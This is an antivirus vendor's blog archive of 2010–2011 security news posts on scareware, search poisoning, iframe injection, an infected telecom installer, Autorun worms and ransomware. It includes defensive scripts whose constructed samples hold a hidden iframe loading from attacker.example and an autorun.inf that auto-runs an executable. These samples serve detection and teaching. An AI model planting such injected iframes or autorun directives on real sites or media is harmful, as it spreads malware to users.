Archive for the ‘Security news’ Category

Malware Authors Pusk Their Luck

Friday, May 27th, 2011

Malware authors have long realized that scare tactics work when it comes to parting people from their money. Why waste time finding a new vulnerability to spread malware when you can scare people into downloading and running it themselves? For a while now, fake anti-virus malware has been one of the top revenue generators for malware authors.

Lately, however, users have become more vigilant towards such fraudulent security tools and simply ignore their spurious warnings. Malware authors, having realized this, have upped their game by changing the scareware reports to warn of hard drive failures rather than virus infections.

Over the last month, K7TCL noticed a steady rise in the number of samples arriving from various sources under the name “pusk.exe”. Closer analysis of one sample revealed it to be a fake disk diagnostic tool. On installation, the malware displays the following message:

The malware then goes on to display fake disk diagnosis messages:

It’s no surprise that when the users click on the “Fix Errors” dialogue box, they see the message below:

These samples are detected generically as “Trojan (0026b5241)”.

Lokesh Kumar
K7TCL

When searches have been laden with malware

Saturday, May 14th, 2011

Miscreants are always geared up to start a new wave of spam and malware campaigns. When a sensational event occurs, users go searching for news on it, making it easy for the criminals to do what they do best.

Case in point: last week saw the Internet abuzz with news of Osama Bin Laden’s death. Some research into users’ search behaviour on Google Trends revealed that the largest number of searches was for the keyword “Osama”, and that the largest number of searches came from the United States.

The second to top the list was India, with Tamil Nadu leading the way, closely followed by Karnataka.

The bad guys tried to capitalize on this news by poisoning search results and spreading malware and spam. They set up fake videos, Facebook wall posts and websites, all claiming to reveal “exclusive” information on the death of Al-Qaeda’s top man, and thereby lured potential victims into their trap.

Out of approximately 1,00,000 videos uploaded to date on YouTube with the keyword “Osama”, around 23,000 were uploaded in the past week alone.

Also, there were around 1,300 websites registered, in the first 3 days since the news emerged, relating to Osama’s death.

Out of these newly registered websites, the maximum number of registrations was made with the registrar “1 & 1 Internet AG”, followed by namecheap.com.

Queries on domain reputation sites such as www.malwareurl.com indicate that both registrars have hosted sites that spread exploits and spam before.

Lokesh Kumar
K7 TCL

You’ve Been iFramed

Friday, April 8th, 2011

There is nothing surprising about compromised web servers dishing out an iframe which redirects users to a potentially malicious site. K7TCL recently came across one such site which belongs to the Indian government and is currently injected with a malicious iframe.

Analyzing the contents of the iframe reveals that it redirects users to urinoor.com.

A quick whois on this site shows that it is registered to a user called “saamfoster”, who is infamous for registering other sites which implement “drive-by” exploits and use social engineering techniques to get users to install malware, disguised as a video codec or an anti-virus package.

Although the infiltration vector on the government site is unknown, what is known is that the website referenced by the iframe has been down for a while now. This, however, doesn’t mean that the threat has been neutralized. Many a time, we have seen old domains spring back to life and start spreading malware all over again. The site administrator not only needs to ensure that the malicious iframe is completely cleaned up, but also that the infiltration vector is investigated thoroughly, and fixed appropriately.
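A site administrator cleaning up after an injection like this needs a way to find iframes that do not belong, and to re-check the page afterwards in case the injection returns. The scanner below is an added example written for this post, not K7TCL's tooling: it parses a page, collects every iframe, and flags those whose source is off-site, hidden via CSS, or sized 1x1, the three traits that typically distinguish an injected frame from a legitimate one. The sample page and the domain attacker.example are constructed.

```python
"""Flag iframes in a page that look injected: off-site, hidden, or 1x1.

Added example for this post, not K7TCL's own tooling. SAMPLE_HTML and the
host 'attacker.example' are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a legitimate page with one injected iframe appended
# after </html>, which is where injected content often lands on a
# compromised server.
SAMPLE_HTML = """<html><head><title>Dept of Example</title></head>
<body><h1>Welcome</h1>
<iframe src="/videos/intro.html" width="400" height="300"></iframe>
</body></html>
<iframe src="http://attacker.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # valueless attributes arrive as None; normalise to ""
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(attrs):
    """True when width or height is 2px or less (classic 1x1 drive-by frame)."""
    try:
        w = int(attrs.get("width", "100").strip("\"' px"))
        h = int(attrs.get("height", "100").strip("\"' px"))
    except ValueError:
        return False
    return w <= 2 or h <= 2


def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, site_host):
    """Return [(src, [reasons])] for iframes that are off-site, hidden or tiny.

    site_host is the hostname the page legitimately lives on; relative
    sources (no host) are treated as on-site.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        reasons = []
        if host and host.lower() != site_host.lower():
            reasons.append(f"off-site src host {host}")
        if _is_tiny(attrs):
            reasons.append("1x1 or smaller frame")
        if _is_hidden(attrs):
            reasons.append("hidden via style")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_HTML, "gov.example"):
        print(src, "->", "; ".join(reasons))
```

Run it over a fetched copy of the page (or over each file in the web root) with the site's own hostname; an empty result after cleanup, repeated on a schedule, is the check that the injection has not come back while the infiltration vector is still being investigated.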

K7TCL attempted to contact the site administrator but our efforts were in vain.

Lokesh Kumar
K7TCL

Bugs in the Zodiac?

Friday, April 1st, 2011

Zodiac

Proactive protection is extremely important in the current threat landscape, where malware changes faster than the time taken for light to travel from the Sun to Earth.

Along with robust static and dynamic proactive Anti-Virus protection, K7TCL is contemplating providing a unique, bespoke service to the individual based on complex astrological calculations which have evolved since Vedic times in India.

We are hoping to help answer questions such as “How likely am I to get infected now or in the future, and with what?”. The mathematical formulae involve asterisks, i.e. “stars”, geometric positions, and “signed” comparison operations on individual horoscope data.

K7TCL advice may include corrective steps to be taken to counter any warnings of impending doom. Even under these circumstances one ought not to panic as there is always room for one’s destiny to be what one makes of it.

In addition, given the nature of fatalistic heuristics, 100% accuracy cannot be guaranteed. Nevertheless, today, the 1st of April 2011, is a “good” day to let people know about some of the plans we are considering.

Credits:
Images courtesy of vedic-academy.com and paceywilliams.com

Samir Mody
Senior Manager K7TCL

They Write Bug Free Code, and the Virus is Complimentary

Friday, March 18th, 2011

We recently noticed that one of India’s biggest telecom service providers is currently serving up an infected version of a modem application on its website. This application is infected with a notorious file infector named “Sality”. While this is not the first time that a big player in the software market has served up an infected version of an application, it goes to show that good software quality assurance is still not taken seriously.

Quality assurance as a function in any organization should ensure not only that the code written is bug free, but also that it is virus free. Implementing simple security protocols at the different stages of a software release cycle would go a long way towards ensuring that virus-free software is provided to users.

The build environment used to compile the source code, for example, should be secure and could be isolated. There have been known cases where malware such as “Induc” infects the source code, which in turn produces infected executables. This drives home the point that even an isolated environment still needs an Anti-Virus solution installed. Once the executable is compiled, it is imperative that it is checked for any malware infections before release.

Additionally, the hosting environment used to serve the file to customers should have especially beefed-up security practices in place. Submitting the file served by the telecom service provider to VirusTotal shows that it is detected by almost all Anti-Virus vendors. This could imply either that the server hosting the file doesn’t have any Anti-Virus solution installed, or, if one is installed, that the product has been compromised.
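The build-then-host advice above amounts to one concrete control: record what the clean build produced, and keep checking that the download server still serves exactly those bytes. The script below is an added example written for this post, not the telecom provider's process or K7's product. It hashes the build output into a manifest, authenticates the manifest with an HMAC so that whoever can overwrite binaries on the web server cannot also rewrite the expected hashes, and then compares what the server serves against it. The build files, the infected copy and the key are constructed in memory; the manifest key would live with the build/QA team, not on the hosting server.

```python
"""Build-time manifest plus post-publication integrity check for release files.

Added example for the QA/hosting advice in this post; not the provider's or
K7's own process. All files, bytes and the key below are constructed.
"""
import hashlib
import hmac
import json


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _canonical(digests: dict) -> bytes:
    # Deterministic encoding so the MAC is reproducible across runs.
    return json.dumps(digests, sort_keys=True, separators=(",", ":")).encode()


def make_manifest(files: dict, signing_key: bytes) -> dict:
    """files: {name: bytes} from a clean, scanned build.

    Returns {'digests': {...}, 'mac': hex} where the MAC covers the digest
    list, so a tampered hosting server cannot silently rewrite the expected
    hashes along with the binaries.
    """
    digests = {name: sha256_hex(blob) for name, blob in sorted(files.items())}
    mac = hmac.new(signing_key, _canonical(digests), "sha256").hexdigest()
    return {"digests": digests, "mac": mac}


def verify_release(served: dict, manifest: dict, signing_key: bytes) -> list:
    """Compare what the download server actually serves against the manifest.

    served: {name: bytes} as fetched from the public URL.
    Returns a list of problem strings; an empty list means everything matched.
    """
    expected_mac = hmac.new(signing_key, _canonical(manifest["digests"]), "sha256").hexdigest()
    if not hmac.compare_digest(expected_mac, manifest["mac"]):
        return ["manifest MAC mismatch: manifest itself was altered"]
    problems = []
    for name, expected in manifest["digests"].items():
        if name not in served:
            problems.append(f"{name}: missing from download server")
        elif not hmac.compare_digest(sha256_hex(served[name]), expected):
            problems.append(f"{name}: digest mismatch (file changed after build)")
    for name in served:
        if name not in manifest["digests"]:
            problems.append(f"{name}: unexpected extra file")
    return problems


# Constructed sample data. A file infector rewrites or appends to the
# executable, so the served bytes no longer match the clean build.
KEY = b"constructed-demo-key-kept-off-the-web-server"
CLEAN_BUILD = {
    "modem_setup.exe": b"MZ\x90\x00clean-installer-bytes",
    "readme.txt": b"usage notes",
}
MANIFEST = make_manifest(CLEAN_BUILD, KEY)
SERVED_OK = dict(CLEAN_BUILD)
SERVED_INFECTED = dict(CLEAN_BUILD)
SERVED_INFECTED["modem_setup.exe"] = CLEAN_BUILD["modem_setup.exe"] + b"\x00appended-infector-section"

if __name__ == "__main__":
    print("clean server   :", verify_release(SERVED_OK, MANIFEST, KEY))
    print("infected server:", verify_release(SERVED_INFECTED, MANIFEST, KEY))
```

In practice `served` is populated by downloading the files from the public URL on a schedule, from outside the hosting environment, so the check catches a server-side compromise even when the server's own Anti-Virus has been disabled or subverted.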

Organisations which take their reputation seriously cannot afford to tarnish it by getting their customers infected, even if it is unintentional. Several attempts were made by K7TCL to contact the organization in question, but they fell on deaf ears. The malicious file is still being served on their website.

Lokesh Kumar
K7 TCL

Auto-Start Your Security

Friday, February 11th, 2011

In an anticipated move, Microsoft has recently decided to improve the security of the Autorun feature available on its Windows platforms, specifically on Windows XP. The solution provided by Microsoft stops applications from launching automatically from a removable device, and should limit the amount of malware that spreads through devices such as USB drives.

For the uninitiated, Autorun is a feature that runs an application automatically when you insert removable media (CD, DVD, USB storage devices, etc.) into your computer. While it has its practical uses, this feature has been abused over the last few years by malware to spread itself, especially in India.

Shown below is an example of what the contents of a potential malicious autorun.inf [Configuration file for Autorun] could look like:

When a removable device containing the above autorun.inf, and its associated DeliveryReport.exe, is inserted into a Microsoft Windows XP computer with default settings, the malicious file, DeliveryReport.exe, is executed automatically without any user interaction.
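The directives that make Windows run something on insert are few and well documented, so an autorun.inf can be triaged mechanically before the device is trusted. The checker below is an added example written for this post, not K7's engine or Microsoft's fix. It parses the file as the INI-style format it is and reports three things: `open`/`shellexecute` entries (automatic launch on pre-fix Windows XP), `shell\verb\command` entries (which hijack the Explorer double-click or context-menu action even where automatic launch is off), and an `action` label that imitates the built-in “Open folder to view files” choice. The autorun.inf text is constructed; DeliveryReport.exe is the filename from the post, used only as sample text.

```python
"""Triage an autorun.inf from removable media for auto-execution directives.

Added example for this post (not K7's product, not Microsoft's update).
CONSTRUCTED_AUTORUN_INF is made up; DeliveryReport.exe is the filename
mentioned in the post, used here only as sample text.
"""
import configparser
import re

# [autorun] keys that launch a program on insertion (documented directives).
EXEC_KEYS = {"open", "shellexecute"}
# shell\<verb>\command=... replaces what Explorer runs for a verb such as
# "open" or "explore", so a double-click on the drive runs the payload.
SHELL_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)

# Constructed sample mirroring the pattern described in the post.
CONSTRUCTED_AUTORUN_INF = """[autorun]
open=DeliveryReport.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
shell\\open\\command=DeliveryReport.exe
"""


def parse_autorun(text):
    """Parse autorun.inf with no interpolation (values contain % and \\)."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case; comparisons below are case-insensitive
    cp.read_string(text)
    return cp


def autorun_findings(text):
    """Return (key, value, reason) for directives that run code or disguise it."""
    cp = parse_autorun(text)
    findings = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):
            k = key.lower()
            v = value.strip()
            if k in EXEC_KEYS:
                findings.append((key, v, "launches a program automatically on insert (pre-fix Windows XP)"))
            elif SHELL_COMMAND_RE.match(k):
                findings.append((key, v, "replaces the Explorer double-click/context-menu action"))
            elif k == "action" and ("open folder" in v.lower() or "view files" in v.lower()):
                findings.append((key, v, "AutoPlay label mimics the built-in 'Open folder' choice"))
    return findings


def is_safe_autorun(text):
    """True when the file only sets cosmetic keys such as icon and label."""
    return not autorun_findings(text)


if __name__ == "__main__":
    for key, value, reason in autorun_findings(CONSTRUCTED_AUTORUN_INF):
        print(f"{key} = {value}\n    {reason}")
```

A benign autorun.inf that only sets `icon` and `label` produces no findings; anything the checker does report is worth a look before the referenced executable is allowed to run, and the executable itself should of course go to the Anti-Virus scanner regardless of what the .inf says.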

Below is a chart indicating the top malware types as seen by K7 from various sources in the previous quarter:

Given the absolute numbers of malware out there, the above chart shows a significant proportion of Autorun worms. When we consider K7’s Indian clients alone, the numbers are even more alarming, since almost 50% of the malware submitted uses Autorun to spread. Furthermore, destructive malware such as Stuxnet and Sality also have Autorun spreading capabilities.

Most Anti-Virus vendors, including K7, have already incorporated threat-specific Anti-Malware security features in their products to thwart such Autorun malware. Although Microsoft’s solution applies only to USB storage media, and not to CDs/DVDs, this optional software upgrade is still a welcome move and we implore our customers to download and install it. For more information on this software upgrade, please visit Microsoft’s site.

Lokesh Kumar
K7 TCL

Let Cricket Fever be the Only Infection You Contract

Thursday, February 3rd, 2011

It is no shocking news that cricket fans all over the world are gearing up for the upcoming ICC Cricket World Cup 2011. Apart from the sporting venue, there is one major difference between this world cup and the previous one – cyber technology has come a long way. For example, social networking sites which enable instant exchange of information, and video streaming sites which enable live streaming of events, have now become extremely popular.

Needless to say, millions of cricket fanatic Indians, in the hope of catching their favourite demigod – Sachin Tendulkar in action, will search for sites streaming the cricket match live. Innocent users need to be aware that, unfortunately, malware authors could lure you into fishing outside your off stump. They may attempt to install what purports to be a “video codec” to begin watching the stream, but this turns out to be a mechanism to deliver malware.

Malware authors can also be found attempting to spam users on social networking sites such as Facebook. Such spammed messages could eventually be used to distribute malicious code, disguised as an application intended to provide live score feeds, post match discussions, etc. Such malware could steal the user’s personal information from his/her computer.

We aren’t dissuading users from using social networking sites or watching cricket on the Internet. Rather, we are simply advising users to exercise caution while doing so, and to keep their Anti-Virus software up to date. If users come across such malicious applications or sites distributing malware, please feel free to send them to K7 Computing’s Threat Control Lab for further analysis.

Credits:
Images courtesy of 87pestspray.com, wikipedia.com

Lokesh Kumar
K7TCL

Perestroika in the Malware World?

Friday, January 14th, 2011

In a consumer economy where the customer is king, we often find that product material is tailor-made for a target market. Even a good product could fail to impress if the information available on it is not effectively communicated. The Internet is no different in this respect. For example, most consumer websites redirect a user to a localised version of the site based on the visitor’s geographic location.

Malware authors have been quick to adopt this idea in their social engineering techniques. It is now common to see spam and malicious sites use local languages to spread regional malware. Some drive-by downloads, for example, deliver custom malware based on the user’s geo-location.

However, some malware authors do not bother to make the extra effort. At K7TCL we recently saw an example of ransomware which appears to have come from Russia. The malware holds the computer to ransom by locking the user out. Access to the computer is denied until the victim enters a serial number, which has to be requested from the attacker for a price. Shown below is a screenshot of the ransom message:

The point is that though the sample was accessed from an IP address originating from India, and from a site serving English content, the malware displays the ransom message in Cyrillic text. Most non-Russians are unlikely to be able to understand the ransom message, and will not even be able to decipher the text using online tools since the machine is locked out.

How does one resolve this situation? One solution could be to consult a Russian friend and have sufficient funds in your bank account. A far better solution would be to use up-to-date Anti-Virus software. Detection and cleaning for this malware is available in K7 Total Security as Riskware (0015e4f01).

Lokesh Kumar
Collection Manager, K7TCL

K7 Sponsors AVAR

Monday, November 15th, 2010

K7 is proud to be sponsoring the international AVAR conference. This prestigious event is now in its 13th year and brings together top speakers from all over the world. You will be able to hear two speakers from K7 this year: first Samir Mody, who will discuss the problems of dealing with custom malware packers, and later the K7 CTO, who will present a paper on malware prevalence and its importance in testing.

Drop in and say hi, see you in Bali!

Microsoft Bumper pack

Wednesday, October 13th, 2010

In something of a record update release, Microsoft has patched 49 vulnerabilities in its software. Last year we reported on their previous huge update, but this outdoes it by 15 updates!

This is a good time to remember to keep your Windows updated, but more than that, to ensure you also keep your anti-virus updated, to take care of those problems that haven’t yet been patched by software vendors.

Don’t forget that Adobe also released a slew of critical patches last week in a drive to fix some of the more critical problems in Flash and Acrobat/Reader.

Andrew Lee
CTO, K7 Computing